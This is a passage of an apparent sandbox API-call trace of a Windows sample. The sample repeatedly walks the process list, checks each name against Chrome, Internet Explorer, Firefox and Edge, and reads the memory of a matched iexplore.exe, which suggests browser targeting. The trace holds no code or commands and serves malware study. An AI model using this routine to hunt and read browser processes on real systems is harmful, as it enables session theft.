	[0225.615] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0225.616] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5cf8
	[0225.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.616] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0225.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.616] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0225.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.616] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0225.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.617] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.617] NtQueryInformationProcess (in: ProcessHandle=0x5cf8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0225.617] ReadProcessMemory (in: hProcess=0x5cf8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0225.617] ReadProcessMemory (in: hProcess=0x5cf8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0225.617] ReadProcessMemory (in: hProcess=0x5cf8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0225.617] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0225.617] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0225.618] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x5cfc
	[0225.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.618] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0225.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.619] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.619] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0225.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.619] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.619] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0225.620] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x5d00
	[0225.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.620] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0225.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.621] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.621] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0225.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.621] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.621] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.622] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5d04
	[0225.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.622] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.623] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.623] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.623] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.624] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.624] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.625] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5d08
	[0225.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.625] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.626] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.626] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.626] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.626] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.627] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x5d0c
	[0225.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.627] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.628] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.628] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.628] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.628] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0225.629] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x5d10
	[0225.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.629] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0225.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.630] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.630] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0225.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.630] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.631] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0225.631] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x5d14
	[0225.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.631] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.632] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.632] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.632] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.633] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.633] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x5d18
	[0225.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.633] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.634] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.634] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.634] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.635] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0225.635] CloseHandle (hObject=0x4fd0) returned 1
	[0225.635] Sleep (dwMilliseconds=0x64) 
	[0225.734] GetCurrentProcessId () returned 0x110
	[0225.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0225.740] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0225.741] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0225.742] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0225.743] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5d1c
	[0225.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.743] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0225.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.743] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.744] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0225.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.744] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.744] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0225.745] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5d20
	[0225.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.745] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0225.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.746] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.746] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0225.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.746] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.746] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0225.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5d24
	[0225.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.747] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0225.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.748] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.748] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0225.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.749] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.749] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0225.750] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x5d28
	[0225.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.750] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0225.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.750] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.751] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0225.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.751] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.751] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0225.752] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5d2c
	[0225.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.752] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0225.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.753] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.753] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0225.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.753] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.754] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0225.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5d30
	[0225.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.754] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0225.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.755] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.755] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0225.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.755] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.756] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0225.756] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5d34
	[0225.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.757] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0225.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.757] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.757] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0225.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.757] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.758] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0225.759] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x5d38
	[0225.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.759] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0225.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.759] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.760] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0225.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.760] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.760] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.761] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5d3c
	[0225.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.761] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.762] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.762] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.762] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.762] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5d40
	[0225.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.763] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.764] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.764] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.764] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.765] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.765] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5d44
	[0225.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.765] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.766] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.766] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.766] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.767] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x5d48
	[0225.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.767] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.768] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.768] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.768] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.769] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.769] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5d4c
	[0225.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.770] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.770] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.770] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.770] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.771] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.771] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5d50
	[0225.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.772] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
